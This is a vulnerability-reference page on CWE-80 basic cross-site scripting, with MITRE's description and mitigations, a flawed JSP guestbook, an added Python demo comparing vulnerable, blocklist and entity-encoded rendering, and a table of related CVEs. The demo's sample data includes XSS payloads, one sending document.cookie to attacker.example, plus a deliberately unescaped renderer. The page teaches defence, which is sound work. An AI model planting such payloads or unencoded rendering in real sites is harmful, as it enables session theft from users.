CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)): Vulnerability Class, 403 CVEs

403 vulnerabilities are classified as CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)). AI-generated Chinese analysis included.

CWE-80 is the basic form of cross-site scripting: an application takes data from an upstream source (a request parameter, a stored comment, a request header) and writes it into a web page without neutralizing the characters that HTML treats as markup. An attacker who controls that data can therefore inject HTML tags and, through them, JavaScript that the victim's browser executes within the origin and session of the vulnerable site. In the reflected variant the payload travels in a crafted URL or form submission that the page echoes back to the same victim; in the stored variant it is persisted (a guestbook entry, a chat channel name, an asset record) and served to every later viewer. Consequences include session hijacking, theft of credentials and other page data, actions forged with the victim's privileges, and defacement. The primary mitigation is context-aware output encoding: convert "<", ">", "&" and the quote characters into their HTML entity equivalents at the point where data is written into the page, using the encoding that matches the exact output context (element body, attribute value, URL, script block). Allowlist input validation, a Content Security Policy that restricts where scripts may load from, HttpOnly session cookies, and templating frameworks that escape by default are valuable defense-in-depth measures, but none of them replaces encoding the output.

MITRE CWE Description
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "<", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.
Common Consequences (1)
Scope: Confidentiality, Integrity, Availability
Impact: Read Application Data, Execute Unauthorized Code or Commands
An attacker could insert special characters that are processed client-side in the context of the user's session.
Mitigations (4)
Implementation: Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities i…
Implementation: Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are i…
Implementation: With Struts, write all data from form beans with the bean's filter attribute set to true.
Implementation: To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is n…
Effectiveness: Defense in Depth
Examples (1)
In the following example, a guestbook comment isn't properly encoded, filtered, or otherwise neutralized for script-related tags before being displayed in a client browser.
Bad · JSP

    <% for (Iterator i = guestbook.iterator(); i.hasNext(); ) {
           Entry e = (Entry) i.next(); %>
        <p>Entry #<%= e.getId() %></p>
        <p><%= e.getText() %></p>
    <% } %>
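The following is an added example, not code from the CWE entry, MITRE, or any product listed on this page. It reproduces the guestbook rendering of the JSP example in Python three ways: the original flaw (values concatenated into the page unchanged), the common non-fix of deleting one dangerous substring, and the hardened form that entity-encodes every dynamic value at the point of output, as the summary above and MITRE's first two mitigations recommend. It also shows an allowlist check for the author field as a second layer. The Entry class, the field names, the sample payloads, the blocklist regex and the allowlist pattern are all constructed for illustration.

```python
import html
import re
from dataclasses import dataclass


# Hypothetical guestbook entry; both string fields are attacker-controlled
# and stored verbatim, exactly like e.getText() in the JSP example.
@dataclass
class Entry:
    id: int
    author: str
    text: str


# Constructed sample data: one benign entry plus payloads aimed at the
# element body (2, 3) and at breaking out of a quoted attribute (4).
GUESTBOOK = [
    Entry(1, "alice", "Nice site & thanks!"),
    Entry(2, "bob", "<script>document.location='https://attacker.example/?c='+document.cookie</script>"),
    Entry(3, "carol", "<img src=x onerror=alert(document.domain)>"),
    Entry(4, '" onmouseover="alert(1)', "harmless text"),
]


def render_vulnerable(entries):
    """Same flaw as the JSP example: stored values are written into the page as-is."""
    return "".join(
        f'<p title="{e.author}">Entry #{e.id}</p><p>{e.text}</p>' for e in entries
    )


SCRIPT_TAG = re.compile(r"<script", re.IGNORECASE)


def render_blocklist(entries):
    """The common mistake: strip one dangerous substring instead of encoding for
    the output context. Entry 3 (no <script>) and entry 4 (attribute breakout)
    pass straight through."""
    return "".join(
        f'<p title="{SCRIPT_TAG.sub("", e.author)}">Entry #{e.id}</p>'
        f'<p>{SCRIPT_TAG.sub("", e.text)}</p>'
        for e in entries
    )


def encode_html(value) -> str:
    """Neutralize for HTML element content or a quoted attribute value:
    & < > " ' become entities, so user data can neither open a tag nor close
    the attribute the template placed it in."""
    return html.escape(str(value), quote=True)


def render_safe(entries):
    """Hardened version: every dynamic value is encoded at the point of output,
    and attributes are always quoted so entity encoding is sufficient there."""
    return "".join(
        f'<p title="{encode_html(e.author)}">Entry #{e.id}</p>'
        f"<p>{encode_html(e.text)}</p>"
        for e in entries
    )


# Positive specification (allowlist) for the author field, as MITRE advises.
# This is a second layer only; the output still has to be encoded.
AUTHOR_ALLOWED = re.compile(r"^[A-Za-z0-9 ._-]{1,40}$")


def author_is_valid(author: str) -> bool:
    return AUTHOR_ALLOWED.fullmatch(author) is not None


def user_markup_survives(rendered: str) -> bool:
    """Check: after removing the template's own <p ...> and </p> wrappers, does
    any raw '<' that starts a tag remain? Correctly encoded output has none,
    because every '<' from user data has become '&lt;'."""
    body = re.sub(r"</?p\b[^>]*>", "", rendered)
    return re.search(r"<[A-Za-z/]", body) is not None


def demo() -> dict:
    """Render the constructed guestbook three ways and report, per variant,
    whether attacker-controlled markup survived into the page."""
    return {
        name: user_markup_survives(fn(GUESTBOOK))
        for name, fn in (
            ("vulnerable", render_vulnerable),
            ("blocklist", render_blocklist),
            ("safe", render_safe),
        )
    }


if __name__ == "__main__":
    for name, leaked in demo().items():
        print(f"{name:10s} user markup survives: {leaked}")
    print(render_safe(GUESTBOOK))
```

The blocklist variant is included because it is the pattern behind many of the CVEs in the table below: the filter removes the one string the developer thought of and leaves every other tag and attribute-breakout intact, whereas entity encoding makes the output context irrelevant to what the user typed.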
| CVE ID | Title | Product | CVSS | Severity | Published |
|---|---|---|---|---|---|
| CVE-2023-30615 | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) in iris-web | iris-web | 6.3 | Medium | 2023-05-25 |
| CVE-2023-0007 | PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in the Panorama Web Interface | PAN-OS | 6.5 | Medium | 2023-05-10 |
| CVE-2023-25833 | BUG-000155004 HTML injection issue in Portal for ArcGIS. | Portal for ArcGIS | 5.4 | Medium | 2023-05-10 |
| CVE-2023-1384 | Amazon Fire TV Stick Cross-Site Scripting Vulnerability | Fire TV Stick 3rd gen | 4.3 | Medium | 2023-05-03 |
| CVE-2023-22309 | Reflected Cross Site Scripting (XSS) | Checkmk Appliance | 6.1 | Medium | 2023-04-20 |
| CVE-2023-29508 | org.xwiki.platform:xwiki-platform-livedata-macro vulnerable to Cross-site Scripting | xwiki-platform | 8.9 | High | 2023-04-16 |
| CVE-2022-35850 | Fortinet FortiAuthenticator Cross-Site Scripting Vulnerability | FortiAuthenticator | 4.2 | Medium | 2023-04-11 |
| CVE-2023-29112 | Code Injection vulnerability in SAP Application Interface Framework (Message Monitoring) | Application Interface Framework (Message Monitoring) | 3.7 | Low | 2023-04-11 |
| CVE-2023-29110 | Code Injection vulnerability in SAP Application Interface Framework (Message Dashboard) | Application Interface Framework (Message Dashboard) | 3.7 | Low | 2023-04-11 |
| CVE-2023-28851 | Silverstripe Form Capture vulnerable to Stored Cross-Site Scripting | silverstripe-form-capture | 6.1 | Medium | 2023-04-03 |
| CVE-2023-1013 | XSS in Vira-Investing | Vira-Investing | 6.1 | Medium | 2023-03-30 |
| CVE-2022-1274 | Keycloak Cross-Site Scripting Vulnerability | keycloak | 5.4 | - | 2023-03-29 |
| CVE-2021-44197 | XSS in UBIT Information Technologies Student Information Management System | Student Information Management System | 6.1 | Medium | 2023-03-07 |
| CVE-2021-44196 | XSS in UBIT Information Technologies Student Information Management System | Student Information Management System | 6.1 | Medium | 2023-03-07 |
| CVE-2023-26047 | teler-waf contains detection rule bypass via entities payload | teler-waf | 6.5 | Medium | 2023-03-03 |
| CVE-2023-26046 | teler-waf subject to bypass of common web attack threat rule with HTML entities payload | teler-waf | 6.5 | Medium | 2023-03-02 |
| CVE-2023-22464 | ViewVC XSS vulnerability in revision view changed path "copyfrom" locations | viewvc | 5.4 | Medium | 2023-01-04 |
| CVE-2022-38210 | HTML injection in accountswitcher-callback.html (10.9.1, 10.8.1 and 10.7.1 only) | ArcGIS Enterprise | 6.1 | Medium | 2022-12-30 |
| CVE-2022-23543 | HTML attributes when attaching a YouTube link to the post | silverwaregames-io-issue-tracker | 6.3 | Medium | 2022-12-19 |
| CVE-2022-28703 | Lansweeper Cross-Site Scripting Vulnerability | lansweeper | 5.4 | - | 2022-12-19 |
| CVE-2022-46350 | Siemens SCALANCE Series Cross-Site Scripting Vulnerability | SCALANCE X204RNA (HSR) | 7.5 | - | 2022-12-13 |
| CVE-2022-39371 | Stored Cross-Site Scripting (XSS) through asset inventory in GLPI | glpi | 7.5 | High | 2022-11-03 |
| CVE-2022-3844 | Webmin index.cgi cross site scripting | Webmin | 3.5 | Low | 2022-11-02 |
| CVE-2022-39348 | Twisted vulnerable to NameVirtualHost Host header injection | twisted | 5.4 | Medium | 2022-10-26 |
| CVE-2022-39301 | sra-admin is vulnerable to storage cross-site scripting (XSS) via unrestricted file upload | sra-admin | 8.2 | High | 2022-10-19 |
| CVE-2022-36057 | Discourse-Chat Cross-Site Scripting issue for channel names and descriptions | discourse-chat | 5.4 | Medium | 2022-09-06 |
| CVE-2022-35278 | HTML Injection in ActiveMQ Artemis Web Console | Apache ActiveMQ Artemis | 6.1 | - | 2022-08-23 |
| CVE-2022-36325 | Siemens SCALANCE Security Vulnerability | RUGGEDCOM RM1224 LTE(4G) EU | 6.8 | Medium | 2022-08-10 |
| CVE-2022-1293 | XSS vulnerability in Citadel | Citadel Web Client | 5.7 | Medium | 2022-08-02 |
| CVE-2017-20140 | Itech Movie Portal Script movie.php Reflected cross site scripting | Movie Portal Script | 4.3 | Medium | 2022-07-22 |

Vulnerabilities classified as CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)) account for 403 CVEs. The CWE taxonomy describes the weakness class; review the individual CVEs for product-specific impact.